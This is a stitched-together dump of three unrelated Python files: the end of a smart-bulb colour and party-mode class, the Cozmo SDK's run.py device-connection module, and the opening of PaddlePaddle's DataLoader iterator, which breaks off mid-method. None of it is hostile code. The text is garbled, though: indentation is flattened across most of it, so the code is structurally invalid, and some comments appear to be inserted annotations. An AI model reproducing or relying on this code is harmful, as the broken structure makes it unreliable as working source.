g = 99.4708025861 * math.log(g) - 161.1195681661
g = min(255, max(0, g)) # constrain to [0, 255]
else:
g = t - 60
g = 288.1221695283 * pow(g, -0.0755148492)
g = min(255, max(0, g)) # constrain to [0, 255]
        # blue
        b = 255
        if t <= 19:
            b = 0  # avoid math.log(0) for very low temperatures
        elif t < 66:
            b = t - 10
            b = 138.5177312231 * math.log(b) - 305.0447927307
            b = min(255, max(0, b)) # constrain to [0, 255]
(r_, g_, b_) = \
(int(round(r * brightness / 16, 0)),
int(round(g * brightness / 16, 0)),
int(round(b * brightness / 16, 0)))
return (r_, g_, b_)
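    # Rough reference points for the approximation above (hedged, at full brightness):
    #
    #   ~1700 K -> warm orange, roughly (255, 121, 0)
    #   ~6600 K -> approximately pure white, (255, 255, 255)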
# 1000 <= temp_kelvin <= 40000, 1 <= brightness <= 16
@__check_connection
def set_white_temperature(self, temp_kelvin, brightness):
(r, g, b) = self.__temp_to_rgb(temp_kelvin, brightness)
self.set_color_rgb(r, g, b)
# TODO investigate modes 1, 2 and 3
# 0 -> off
# 1 -> existing color ?? rhythm
# 2 -> existing color ?? rhythm
# 3 -> existing color ?? rhythm
# 4 -> rainbow
# 5 -> pulse
# 6 -> candle
# bulb function 0x81, subfunction 0x04: set party mode
@__check_connection
def set_party_mode(self, mode):
logging.debug('Set party mode %s' % mode)
self.__send_hex_string(0x81, '0000000000000000000d07020304%02x0e' % mode)
self.__is_color = True
|
run.py
|
# Copyright (c) 2016-2017 Anki, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''The run module contains helper classes and functions for opening a connection to the engine.
To get started, the :func:`run_program` function can be used for most cases,
it handles connecting to a device and then running the function you provide with
the SDK-provided Robot object passed in.
The :func:`connect` function can be used to open a connection
and run your own code connected to a :class:`cozmo.conn.CozmoConnection`
instance. It takes care of setting up an event loop, finding the Android or
iOS device running the Cozmo app and making sure the connection is ok.
You can also use the :func:`connect_with_tkviewer` or :func:`connect_with_3dviewer`
functions, which work in a similar way to :func:`connect`, but will also display
either a window on the screen showing a view from Cozmo's camera (using Tk), or
a 3d viewer (with optional 2nd window showing Cozmo's camera) (using OpenGL), if
supported on your system.
Finally, more advanced programs can integrate the SDK with an existing event
loop by using the :func:`connect_on_loop` function.
All of these functions make use of a :class:`DeviceConnector` subclass to
deal with actually connecting to an Android or iOS device. There shouldn't
normally be a need to modify them or write your own.
'''
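# A minimal usage sketch (hedged): this mirrors the "get started" path described in
# the docstring above, assuming the cozmo package is installed and a device is
# running the Cozmo app in SDK mode. Kept as a comment so that importing this
# module has no side effects.
#
#   import cozmo
#
#   def hello(robot: cozmo.robot.Robot):
#       robot.say_text("Hello World").wait_for_completed()
#
#   cozmo.run_program(hello)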
# __all__ should order by constants, event classes, other classes, functions.
__all__ = ['DeviceConnector', 'IOSConnector', 'AndroidConnector', 'TCPConnector',
'connect', 'connect_with_3dviewer', 'connect_with_tkviewer', 'connect_on_loop',
'run_program', 'setup_basic_logging']
import threading
import asyncio
import concurrent.futures
import functools
import inspect
import logging
import os
import os.path
import queue
import shutil
import subprocess
import sys
import types
import warnings
from . import logger, logger_protocol
from . import base
from . import clad_protocol
from . import conn
from . import event
from . import exceptions
from . import usbmux
#: The TCP port number we expect the Cozmo app to be listening on.
COZMO_PORT = 5106
if sys.platform in ('win32', 'cygwin'):
DEFAULT_ADB_CMD = 'adb.exe'
else:
DEFAULT_ADB_CMD = 'adb'
def _observe_connection_lost(proto, cb):
meth = proto.connection_lost
@functools.wraps(meth)
def connection_lost(self, exc):
meth(exc)
cb()
proto.connection_lost = types.MethodType(connection_lost, proto)
class DeviceConnector:
'''Base class for objects that setup the physical connection to a device.'''
def __init__(self, cozmo_port=COZMO_PORT, enable_env_vars=True):
self.cozmo_port = cozmo_port
if enable_env_vars:
self.parse_env_vars()
async def connect(self, loop, protocol_factory, conn_check):
'''Connect attempts to open a connection transport to the Cozmo app on a device.
On opening a transport it will create a protocol from the supplied
factory and connect it to the transport, returning a (transport, protocol)
tuple. See :meth:`asyncio.BaseEventLoop.create_connection`
'''
raise NotImplementedError
def parse_env_vars(self):
try:
self.cozmo_port = int(os.environ['COZMO_PORT'])
except (KeyError, ValueError):
pass
class IOSConnector(DeviceConnector):
'''Connects to an attached iOS device over USB.
Opens a connection to the first iOS device that's found to be running
the Cozmo app in SDK mode.
iTunes (or another service providing usbmuxd) must be installed in order
for this connector to be able to open a connection to a device.
An instance of this class can be passed to the ``connect_`` prefixed
functions in this module.
Args:
serial (string): Serial number of the device to connect to.
If None, then connect to the first available iOS device running
the Cozmo app in SDK mode.
'''
def __init__(self, serial=None, **kw):
super().__init__(**kw)
self.usbmux = None
self._connected = set()
self.serial = serial
async def connect(self, loop, protocol_factory, conn_check):
if not self.usbmux:
self.usbmux = await usbmux.connect_to_usbmux(loop=loop)
try:
if self.serial is None:
device_info, transport, proto = await self.usbmux.connect_to_first_device(
protocol_factory, self.cozmo_port, exclude=self._connected)
else:
device_id = await self.usbmux.wait_for_serial(self.serial)
device_info, transport, proto = await self.usbmux.connect_to_device(
protocol_factory, device_id, self.cozmo_port)
except asyncio.TimeoutError as exc:
raise exceptions.ConnectionError("No connected iOS devices running Cozmo in SDK mode") from exc
device_id = device_info.get('DeviceID')
proto.device_info={
'device_type': 'ios',
'device_id': device_id,
'serial': device_info.get('SerialNumber')
}
if conn_check is not None:
await conn_check(proto)
self._connected.add(device_id)
logger.info('Connected to iOS device_id=%s serial=%s', device_id,
device_info.get('SerialNumber'))
_observe_connection_lost(proto, functools.partial(self._disconnect, device_id))
return transport, proto
def _disconnect(self, device_id):
logger.info('iOS device_id=%s disconnected.', device_id)
self._connected.discard(device_id)
class AndroidConnector(DeviceConnector):
'''Connects to an attached Android device over USB.
This requires the Android Studio command line tools to be installed,
specifically `adb`.
By default the connector will attempt to locate `adb` (or `adb.exe`
on Windows) in common locations, but it may also be supplied by setting
the ``ANDROID_ADB_PATH`` environment variable, or by passing it
to the constructor.
An instance of this class can be passed to the ``connect_`` prefixed
functions in this module.
Args:
serial (string): Serial number of the device to connect to.
If None, then connect to the first available Android device running
the Cozmo app in SDK mode.
'''
def __init__(self, adb_cmd=None, serial=None, **kw):
self._adb_cmd = None
super().__init__(**kw)
self.serial = serial
self.portspec = 'tcp:' + str(self.cozmo_port)
self._connected = set()
if adb_cmd:
self._adb_cmd = adb_cmd
else:
self._adb_cmd = shutil.which(DEFAULT_ADB_CMD)
def parse_env_vars(self):
super().parse_env_vars()
self._adb_cmd = os.environ.get('ANDROID_ADB_PATH')
@property
def adb_cmd(self):
if self._adb_cmd is not None:
return self._adb_cmd
if sys.platform != 'win32':
return DEFAULT_ADB_CMD
# C:\Users\IEUser\AppData\Local\Android\android-sdk
# C:\Program Files (x86)\Android\android-sdk
try_paths = []
for path in [os.environ[key] for key in ('LOCALAPPDATA', 'ProgramFiles', 'ProgramFiles(x86)') if key in os.environ]:
try_paths.append(os.path.join(path, 'Android', 'android-sdk'))
for path in try_paths:
adb_path = os.path.join(path, 'platform-tools', 'adb.exe')
if os.path.exists(adb_path):
self._adb_cmd = adb_path
logger.debug('Found adb.exe at %s', adb_path)
return adb_path
raise ValueError('Could not find Android development tools')
def _exec(self, *args):
try:
result = subprocess.run([self.adb_cmd] + list(args),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, timeout=5)
except Exception as e:
raise ValueError('Failed to execute adb command %s: %s' % (self.adb_cmd, e))
if result.returncode != 0:
raise ValueError('Failed to execute adb command %s: %s' % (result.args, result.stderr))
return result.stdout.split(b'\n')
def _devices(self):
for line in self._exec('devices'):
line = line.split()
if len(line) != 2 or line[1] != b'device':
continue
yield line[0].decode('ascii') # device serial #
def _add_forward(self, serial):
self._exec('-s', serial, 'forward', self.portspec, self.portspec)
def _remove_forward(self, serial):
self._exec('-s', serial, 'forward', '--remove', self.portspec)
async def connect(self, loop, protocol_factory, conn_check):
version_mismatch = None
for serial in self._devices():
if serial in self._connected:
continue
if self.serial is not None and serial.lower() != self.serial.lower():
continue
logger.debug('Checking connection to Android device: %s', serial)
try:
self._remove_forward(serial)
except:
pass
self._add_forward(serial)
try:
transport, proto = await loop.create_connection(
protocol_factory, '127.0.0.1', self.cozmo_port)
proto.device_info={
'device_type': 'android',
'serial': serial,
}
if conn_check:
# Check that we have a good connection before returning
try:
await conn_check(proto)
except Exception as e:
logger.debug('Failed connection check: %s', e)
raise
logger.info('Connected to Android device serial=%s', serial)
self._connected.add(serial)
_observe_connection_lost(proto, functools.partial(self._disconnect, serial))
return transport, proto
except exceptions.SDKVersionMismatch as e:
version_mismatch = e
except:
pass
self._remove_forward(serial)
if version_mismatch is not None:
raise version_mismatch
raise exceptions.ConnectionError("No connected Android devices running Cozmo in SDK mode")
def _disconnect(self, serial):
logger.info('Android serial=%s disconnected.', serial)
self._connected.discard(serial)
class TCPConnector(DeviceConnector):
'''Connects to the Cozmo app directly via TCP.
Generally only used for testing and debugging.
Requires that a SDK_TCP_PORT environment variable be set to the port
number to connect to.
'''
def __init__(self, tcp_port=None, ip_addr='127.0.0.1', **kw):
super().__init__(**kw)
self.ip_addr = ip_addr
if tcp_port is not None:
# override SDK_TCP_PORT environment variable
self.tcp_port = tcp_port
def parse_env_vars(self):
super().parse_env_vars()
self.tcp_port = None
try:
self.tcp_port = int(os.environ['SDK_TCP_PORT'])
except (KeyError, ValueError):
pass
@property
def enabled(self):
return self.tcp_port is not None
async def connect(self, loop, protocol_factory, conn_check):
transport, proto = await loop.create_connection(protocol_factory, self.ip_addr, self.tcp_port)
proto.device_info={
'device_type': 'tcp',
'host': '%s:%s' % (self.ip_addr, self.tcp_port),
}
if conn_check:
try:
await conn_check(proto)
except Exception as e:
logger.debug('Failed connection check: %s', e)
raise
logger.info("Connected to device on TCP port %d" % self.tcp_port)
return transport, proto
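# Hedged usage sketch for TCPConnector: it is only consulted when SDK_TCP_PORT is
# set in the environment, e.g.
#
#   SDK_TCP_PORT=5106 python3 my_script.py
#
# or by passing an explicit connector (my_function is a placeholder):
#
#   connector = TCPConnector(tcp_port=5106)
#   cozmo.connect(my_function, connector=connector)
#
# 5106 here is just COZMO_PORT; any port the app is listening on works.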
class FirstAvailableConnector(DeviceConnector):
'''Connects to the first Android or iOS device running the Cozmo app in SDK mode.
This class creates an :class:`AndroidConnector` or :class:`IOSConnector`
instance and returns the first successful connection.
This is the default connector used by ``connect_`` functions.
'''
def __init__(self):
        super().__init__(enable_env_vars=False)
self.tcp = TCPConnector()
self.ios = IOSConnector()
self.android = AndroidConnector()
    async def _do_connect(self, connector, loop, protocol_factory, conn_check):
connect = connector.connect(loop, protocol_factory, conn_check)
result = await asyncio.gather(connect, loop=loop, return_exceptions=True)
return result[0]
async def connect(self, loop, protocol_factory, conn_check):
conn_args = (loop, protocol_factory, conn_check)
tcp_result = None
if self.tcp.enabled:
tcp_result = await self._do_connect(self.tcp, *conn_args)
if not isinstance(tcp_result, BaseException):
return tcp_result
logger.warning('No TCP connection found running Cozmo: %s', tcp_result)
android_result = await self._do_connect(self.android, *conn_args)
if not isinstance(android_result, BaseException):
return android_result
ios_result = await self._do_connect(self.ios, *conn_args)
if not isinstance(ios_result, BaseException):
return ios_result
logger.warning('No iOS device found running Cozmo: %s', ios_result)
logger.warning('No Android device found running Cozmo: %s', android_result)
if isinstance(tcp_result, exceptions.SDKVersionMismatch):
raise tcp_result
if isinstance(ios_result, exceptions.SDKVersionMismatch):
raise ios_result
if isinstance(android_result, exceptions.SDKVersionMismatch):
raise android_result
raise exceptions.NoDevicesFound('No devices connected running Cozmo in SDK mode')
# Create an instance of a connector to use by default
# The instance will maintain state about which devices are currently connected.
_DEFAULT_CONNECTOR = FirstAvailableConnector()
def _sync_exception_handler(abort_future, loop, context):
loop.default_exception_handler(context)
exception = context.get('exception')
if exception is not None:
abort_future.set_exception(context['exception'])
else:
abort_future.set_exception(RuntimeError(context['message']))
class _LoopThread:
'''Takes care of managing an event loop running in a dedicated thread.
Args:
loop (:class:`asyncio.BaseEventLoop`): The loop to run
f (callable): Optional code to execute on the loop's thread
conn_factory (callable): Override the factory function to generate a
:class:`cozmo.conn.CozmoConnection` (or subclass) instance.
connector (:class:`DeviceConnector`): Optional instance of a DeviceConnector
subclass that handles opening the USB connection to a device.
By default, it will connect to the first Android or iOS device that
has the Cozmo app running in SDK mode.
        abort_future (:class:`concurrent.futures.Future`): Optional future to
raise an exception on in the event of an exception occurring within
the thread.
'''
def __init__(self, loop, f=None, conn_factory=conn.CozmoConnection, connector=None, abort_future=None):
self.loop = loop
self.f = f
if not abort_future:
abort_future = concurrent.futures.Future()
self.abort_future = abort_future
self.conn_factory = conn_factory
self.connector = connector
self.thread = None
self._running = False
def start(self):
'''Start a thread and open a connection to a device.
Returns:
:class:`cozmo.conn.CozmoConnection` instance
'''
q = queue.Queue()
abort_future = concurrent.futures.Future()
def run_loop():
asyncio.set_event_loop(self.loop)
try:
coz_conn = connect_on_loop(self.loop, self.conn_factory, self.connector)
q.put(coz_conn)
except Exception as e:
self.abort_future.set_exception(e)
q.put(e)
return
if self.f:
asyncio.ensure_future(self.f(coz_conn))
self.loop.run_forever()
self.thread = threading.Thread(target=run_loop)
self.thread.start()
        try:
            coz_conn = q.get(timeout=10)
        except queue.Empty:
            raise TimeoutError("Timed out waiting for connection to device")
if isinstance(coz_conn, Exception):
raise coz_conn
self.coz_conn = coz_conn
self._running = True
return coz_conn
def stop(self):
        '''Cleanly shut down the running loop and thread.'''
if self._running:
async def _stop():
await self.coz_conn.shutdown()
self.loop.call_soon(lambda: self.loop.stop())
asyncio.run_coroutine_threadsafe(_stop(), self.loop).result()
self.thread.join()
self._running = False
def abort(self, exc):
'''Abort the running loop and thread.'''
if self._running:
async def _abort(exc):
self.coz_conn.abort(exc)
asyncio.run_coroutine_threadsafe(_abort(exc), self.loop).result()
self.stop()
def _connect_async(f, conn_factory=conn.CozmoConnection, connector=None):
# use the default loop, if one is available for the current thread,
# if not create a new loop and make it the default.
#
# the expectation is that if the user wants explicit control over which
# loop the code is executed on, they'll just use connect_on_loop directly.
loop = None
try:
loop = asyncio.get_event_loop()
except:
pass
if loop is None:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
coz_conn = connect_on_loop(loop, conn_factory, connector)
try:
loop.run_until_complete(f(coz_conn))
except KeyboardInterrupt:
logger.info('Exit requested by user')
finally:
loop.run_until_complete(coz_conn.shutdown())
loop.stop()
loop.run_forever()
_sync_loop = asyncio.new_event_loop()
def _connect_sync(f, conn_factory=conn.CozmoConnection, connector=None):
abort_future = concurrent.futures.Future()
conn_factory = functools.partial(conn_factory, _sync_abort_future=abort_future)
lt = _LoopThread(_sync_loop, conn_factory=conn_factory, connector=connector, abort_future=abort_future)
_sync_loop.set_exception_handler(functools.partial(_sync_exception_handler, abort_future))
coz_conn = lt.start()
try:
f(base._SyncProxy(coz_conn))
finally:
lt.stop()
def connect_on_loop(loop, conn_factory=conn.CozmoConnection, connector=None):
'''Uses the supplied event loop to connect to a device.
Will run the event loop in the current thread until the
connection succeeds or fails.
If you do not want/need to manage your own loop, then use the
:func:`connect` function to handle setup/teardown and execute
a user-supplied function.
Args:
loop (:class:`asyncio.BaseEventLoop`): The event loop to use to
connect to Cozmo.
conn_factory (callable): Override the factory function to generate a
:class:`cozmo.conn.CozmoConnection` (or subclass) instance.
connector (:class:`DeviceConnector`): Optional instance of a DeviceConnector
subclass that handles opening the USB connection to a device.
By default, it will connect to the first Android or iOS device that
has the Cozmo app running in SDK mode.
Returns:
A :class:`cozmo.conn.CozmoConnection` instance.
'''
if connector is None:
connector = _DEFAULT_CONNECTOR
factory = functools.partial(conn_factory, loop=loop)
async def conn_check(coz_conn):
await coz_conn.wait_for(conn.EvtConnected, timeout=5)
async def connect():
return await connector.connect(loop, factory, conn_check)
transport, coz_conn = loop.run_until_complete(connect())
return coz_conn
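# Hedged sketch of driving the connection from your own event loop, assuming a
# `run(coz_conn)` coroutine defined elsewhere:
#
#   loop = asyncio.new_event_loop()
#   coz_conn = connect_on_loop(loop)
#   loop.run_until_complete(run(coz_conn))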
def connect(f, conn_factory=conn.CozmoConnection, connector=None):
'''Connects to the Cozmo Engine on the mobile device and supplies the connection to a function.
Accepts a function, f, that is given a :class:`cozmo.conn.CozmoConnection` object as
a parameter.
The supplied function may be either an asynchronous coroutine function
(normally defined using ``async def``) or a regular synchronous function.
If an asynchronous function is supplied it will be run on the same thread
as the Cozmo event loop and must use the ``await`` keyword to yield control
back to the loop.
If a synchronous function is supplied then it will run on the main thread
and Cozmo's event loop will run on a separate thread. Calls to
asynchronous methods returned from CozmoConnection will automatically
be translated to synchronous ones.
The connect function will return once the supplied function has completed,
    at which time it will terminate the connection to the robot.
Args:
f (callable): The function to execute
conn_factory (callable): Override the factory function to generate a
:class:`cozmo.conn.CozmoConnection` (or subclass) instance.
connector (:class:`DeviceConnector`): Optional instance of a DeviceConnector
subclass that handles opening the USB connection to a device.
By default it will connect to the first Android or iOS device that
has the Cozmo app running in SDK mode.
'''
if asyncio.iscoroutinefunction(f):
return _connect_async(f, conn_factory, connector)
return _connect_sync(f, conn_factory, connector)
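# Hedged example of the coroutine form accepted by connect(); wait_for_robot comes
# from CozmoConnection, and the action shown is only a placeholder:
#
#   async def program(coz_conn):
#       robot = await coz_conn.wait_for_robot()
#       await robot.say_text("Connected").wait_for_completed()  # placeholder action
#
#   cozmo.connect(program)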
def _connect_viewer(f, conn_factory, connector, viewer):
# Run the viewer in the main thread, with the SDK running on a new background thread.
loop = asyncio.new_event_loop()
abort_future = concurrent.futures.Future()
async def view_connector(coz_conn):
try:
await viewer.connect(coz_conn)
if inspect.iscoroutinefunction(f):
await f(coz_conn)
else:
await coz_conn._loop.run_in_executor(None, f, base._SyncProxy(coz_conn))
finally:
viewer.disconnect()
try:
if not inspect.iscoroutinefunction(f):
conn_factory = functools.partial(conn_factory, _sync_abort_future=abort_future)
lt = _LoopThread(loop, f=view_connector, conn_factory=conn_factory, connector=connector)
lt.start()
viewer.mainloop()
except BaseException as e:
abort_future.set_exception(exceptions.SDKShutdown(repr(e)))
raise
finally:
lt.stop()
def connect_with_3dviewer(f, conn_factory=conn.CozmoConnection, connector=None,
enable_camera_view=False):
'''Setup a connection to a device and run a user function while displaying Cozmo's 3d world.
This displays an OpenGL window on the screen with a 3D view of Cozmo's
    understanding of the world. Optionally, if `enable_camera_view` is True, a 2nd OpenGL
    window will also be displayed showing a view of Cozmo's camera. It will raise an
    error if the current system does not support PyOpenGL.
    The function may be either synchronous or asynchronous (defined
    using ``async def``).
The function must accept a :class:`cozmo.CozmoConnection` object as
its only argument.
This call will block until the supplied function completes.
Args:
f (callable): The function to execute
conn_factory (callable): Override the factory function to generate a
:class:`cozmo.conn.CozmoConnection` (or subclass) instance.
connector (:class:`DeviceConnector`): Optional instance of a DeviceConnector
subclass that handles opening the USB connection to a device.
By default it will connect to the first Android or iOS device that
has the Cozmo app running in SDK mode.
enable_camera_view (bool): Specifies whether to also open a 2D camera
view in a second OpenGL window.
'''
try:
from . import opengl
except ImportError as exc:
opengl = exc
if isinstance(opengl, Exception):
if isinstance(opengl, exceptions.InvalidOpenGLGlutImplementation):
raise NotImplementedError('GLUT (OpenGL Utility Toolkit) is not available:\n%s'
% opengl)
else:
raise NotImplementedError('opengl is not available; '
'make sure the PyOpenGL, PyOpenGL-accelerate and Pillow packages are installed:\n'
'Do `pip3 install --user cozmo[3dviewer]` to install. Error: %s' % opengl)
viewer = opengl.OpenGLViewer(enable_camera_view=enable_camera_view)
_connect_viewer(f, conn_factory, connector, viewer)
def connect_with_tkviewer(f, conn_factory=conn.CozmoConnection, connector=None, force_on_top=False):
'''Setup a connection to a device and run a user function while displaying Cozmo's camera.
This displays a Tk window on the screen showing a view of Cozmo's camera.
    It will raise an error if the current system does not support Tk.
    The function may be either synchronous or asynchronous (defined
    using ``async def``).
The function must accept a :class:`cozmo.CozmoConnection` object as
its only argument.
This call will block until the supplied function completes.
Args:
f (callable): The function to execute
conn_factory (callable): Override the factory function to generate a
:class:`cozmo.conn.CozmoConnection` (or subclass) instance.
connector (:class:`DeviceConnector`): Optional instance of a DeviceConnector
subclass that handles opening the USB connection to a device.
By default it will connect to the first Android or iOS device that
has the Cozmo app running in SDK mode.
force_on_top (bool): Specifies whether the window should be forced on top of all others
'''
try:
from . import tkview
except ImportError as exc:
tkview = exc
if isinstance(tkview, Exception):
raise NotImplementedError('tkviewer not available on this platform; '
'make sure Tkinter, NumPy and Pillow packages are installed (%s)' % tkview)
viewer = tkview.TkImageViewer(force_on_top=force_on_top)
_connect_viewer(f, conn_factory, connector, viewer)
def setup_basic_logging(general_log_level=None, protocol_log_level=None,
protocol_log_messages=clad_protocol.LOG_ALL, target=sys.stderr,
deprecated_filter="default"):
'''Helper to perform basic setup of the Python logging machinery.
The SDK defines two loggers:
* :data:`logger` ("cozmo.general") - For general purpose information
about events within the SDK; and
* :data:`logger_protocol` ("cozmo.protocol") - For low level
communication messages between the device and the SDK.
Generally only :data:`logger` is interesting.
Args:
general_log_level (str): 'DEBUG', 'INFO', 'WARN', 'ERROR' or an equivalent
constant from the :mod:`logging` module. If None then a
value will be read from the COZMO_LOG_LEVEL environment variable.
protocol_log_level (str): as general_log_level. If None then a
value will be read from the COZMO_PROTOCOL_LOG_LEVEL environment
variable.
protocol_log_messages (list): The low level messages that should be
logged to the protocol log. Defaults to all. Will read from
the COMZO_PROTOCOL_LOG_MESSAGES if available which should be
a comma separated list of message names (case sensitive).
target (object): The stream to send the log data to; defaults to stderr
deprecated_filter (str): The filter for any DeprecationWarning messages.
This is defaulted to "default" which shows the warning once per
location. You can hide all deprecated warnings by passing in "ignore",
see https://docs.python.org/3/library/warnings.html#warning-filter
for more information.
'''
if deprecated_filter is not None:
warnings.filterwarnings(deprecated_filter, category=DeprecationWarning)
if general_log_level is None:
general_log_level = os.environ.get('COZMO_LOG_LEVEL', logging.INFO)
if protocol_log_level is None:
protocol_log_level = os.environ.get('COZMO_PROTOCOL_LOG_LEVEL', logging.INFO)
if protocol_log_level:
if 'COMZO_PROTOCOL_LOG_MESSAGES' in os.environ:
lm = os.environ['COMZO_PROTOCOL_LOG_MESSAGES']
if lm.lower() == 'all':
clad_protocol.CLADProtocol._clad_log_which = clad_protocol.LOG_ALL
else:
clad_protocol.CLADProtocol._clad_log_which = set(lm.split(','))
else:
clad_protocol.CLADProtocol._clad_log_which = protocol_log_messages
h = logging.StreamHandler(stream=target)
f = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
h.setFormatter(f)
logger.addHandler(h)
    logger.setLevel(general_log_level)
if protocol_log_level is not None:
logger_protocol.addHandler(h)
logger_protocol.setLevel(protocol_log_level)
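# Hedged usage note: run_program() below already calls setup_basic_logging(), so an
# explicit call is only needed when using connect()/connect_on_loop() directly, e.g.
# (my_function is a placeholder):
#
#   cozmo.setup_basic_logging(general_log_level="DEBUG")
#   cozmo.connect(my_function)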
def run_program(f, use_viewer=False, conn_factory=conn.CozmoConnection,
connector=None, force_viewer_on_top=False,
deprecated_filter="default", use_3d_viewer=False):
'''Connect to Cozmo and run the provided program/function f.
Args:
f (callable): The function to execute, accepts a connected
:class:`cozmo.robot.Robot` as the parameter.
use_viewer (bool): Specifies whether to display a view of Cozmo's camera
in a window.
conn_factory (callable): Override the factory function to generate a
:class:`cozmo.conn.CozmoConnection` (or subclass) instance.
connector (:class:`DeviceConnector`): Optional instance of a DeviceConnector
subclass that handles opening the USB connection to a device.
By default it will connect to the first Android or iOS device that
has the Cozmo app running in SDK mode.
force_viewer_on_top (bool): Specifies whether the window should be
forced on top of all others (only relevant if use_viewer is True).
Note that this is ignored if use_3d_viewer is True (as it's not
currently supported on that windowing system).
deprecated_filter (str): The filter for any DeprecationWarning messages.
This defaults to "default", which shows the warning once per
location. You can hide all deprecated warnings by passing in "ignore",
see https://docs.python.org/3/library/warnings.html#warning-filter
for more information.
use_3d_viewer (bool): Specifies whether to display a 3D view of Cozmo's
understanding of the world in a window. Note that if both this and
`use_viewer` are set then the 2D camera view will render in an OpenGL
window instead of a TkView window.
'''
setup_basic_logging(deprecated_filter=deprecated_filter)
# Wrap f (a function that takes in an already created robot)
# with a function that accepts a cozmo.conn.CozmoConnection
if asyncio.iscoroutinefunction(f):
@functools.wraps(f)
async def wrapper(sdk_conn):
try:
robot = await sdk_conn.wait_for_robot()
await f(robot)
except exceptions.SDKShutdown:
pass
except KeyboardInterrupt:
logger.info('Exit requested by user')
else:
@functools.wraps(f)
def wrapper(sdk_conn):
try:
robot = sdk_conn.wait_for_robot()
f(robot)
except exceptions.SDKShutdown:
pass
except KeyboardInterrupt:
logger.info('Exit requested by user')
try:
if use_3d_viewer:
connect_with_3dviewer(wrapper, conn_factory=conn_factory, connector=connector,
enable_camera_view=use_viewer)
elif use_viewer:
connect_with_tkviewer(wrapper, conn_factory=conn_factory, connector=connector,
force_on_top=force_viewer_on_top)
else:
connect(wrapper, conn_factory=conn_factory, connector=connector)
except KeyboardInterrupt:
logger.info('Exit requested by user')
except exceptions.ConnectionError as e:
sys.exit("A connection error occurred: %s" % e)
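# --- Editor-added usage sketch (not part of the original module) ---
# A minimal, hedged illustration of how run_program() is typically invoked from
# user code, assuming the `cozmo` package is installed and a phone running the
# Cozmo app in SDK mode is attached. The program function `hello_program` is
# hypothetical; say_text() returns an action whose completion we wait on.
#
#     import cozmo
#
#     def hello_program(robot: cozmo.robot.Robot):
#         robot.say_text("Hello World").wait_for_completed()
#
#     # COZMO_LOG_LEVEL / COZMO_PROTOCOL_LOG_LEVEL may be set in the environment
#     # to influence setup_basic_logging(), which run_program() calls first.
#     cozmo.run_program(hello_program, use_viewer=True, force_viewer_on_top=True)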
|
dataloader_iter.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import six
import sys
import time
import signal
import numbers
import logging
import itertools
import threading
import numpy as np
import multiprocessing
from collections import namedtuple
from paddle.fluid.framework import _set_expected_place, _current_expected_place
# NOTE: queue has a different name in python2 and python3
import queue
import paddle
from .. import core, layers
from ..framework import in_dygraph_mode
from ..multiprocess_utils import _set_SIGCHLD_handler, MP_STATUS_CHECK_INTERVAL, CleanupFuncRegistrar
from .fetcher import _IterableDatasetFetcher, _MapDatasetFetcher
from .batch_sampler import _InfiniteIterableSampler
from .collate import default_collate_fn, default_convert_fn
from .worker import ParentWatchDog, get_worker_info, _worker_loop, \
_DatasetKind, _IterableDatasetStopIteration, _WorkerException, \
_ResumeIteration
from .flat import _flatten_batch, _restore_batch
__all__ = ['get_worker_info']
class _DataLoaderIterBase(object):
"""
Iterator implementation of DataLoader; loads and feeds mini-batch
data according to the settings of the given dataloader.
Args:
loader(instance of DataLoader): instance of `fluid.io.DataLoader`
"""
def __init__(self, loader):
self._dataset = loader.dataset
self._feed_list = loader.feed_list or []
self._places = loader.places
self._return_list = loader.return_list
self._batch_sampler = loader.batch_sampler
self._drop_last = loader.drop_last
self._auto_collate_batch = loader.auto_collate_batch
self._num_workers = loader.num_workers
self._use_buffer_reader = loader.use_buffer_reader
self._use_shared_memory = loader.use_shared_memory
self._timeout = loader.timeout if loader.timeout > 0 else MP_STATUS_CHECK_INTERVAL
self._worker_init_fn = loader.worker_init_fn
self._dataset_kind = loader.dataset_kind
self._pin_memory = loader.pin_memory
self._sampler_iter = iter(self._index_sampler)
if self._auto_collate_batch:
self._collate_fn = loader.collate_fn or default_collate_fn
else:
self._collate_fn = loader.collate_fn or default_convert_fn
# LoDTensorBlockingQueue instance for create_py_reader and a thread
# to put mini-batch data into self._blocking_queue; mini-batch data
# will be obtained from:
# 1. multi-process mode: get data from workers' result queue
# 2. single-process mode: read mini-batch data in main process
self._blocking_queue = None
self._thread = None
self._thread_done_event = threading.Event()
@property
def _index_sampler(self):
if self._auto_collate_batch:
return self._batch_sampler
else:
if self._dataset_kind == _DatasetKind.MAP:
return list(range(len(self._dataset)))
else:
return _InfiniteIterableSampler(self._dataset, 1)
def __iter__(self):
return self
def __len__(self):
return len(self._batch_sampler)
class _DataLoaderIterSingleProcess(_DataLoaderIterBase):
"""
Single-process implementation of DataLoaderIter, loading data from
loader.data in the main process
"""
def __init__(self, loader):
super(_DataLoaderIterSingleProcess, self).__init__(loader)
self._dataset_fetcher = _DatasetKind.create_fetcher(
self._dataset_kind, self._dataset, self._auto_collate_batch,
self._collate_fn, self._drop_last)
# NOTE: _structure_infos is used to record the data structure of each
# batch so the batch structure can be restored after reading Tensors
# from blocking_queue in single-process mode. Since only a single
# process is used in single-process mode, we can record the data
# structures sequentially in a list without recording the send and
# recv indices.
self._structure_infos = []
# NOTE: len(self._places) batches compose one output
# iteration; set blocking_queue so it can cache at most
# 2 iterations of data here
self._blocking_queue_capacity = 2 * len(self._places)
self._init_thread()
def _init_thread(self):
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
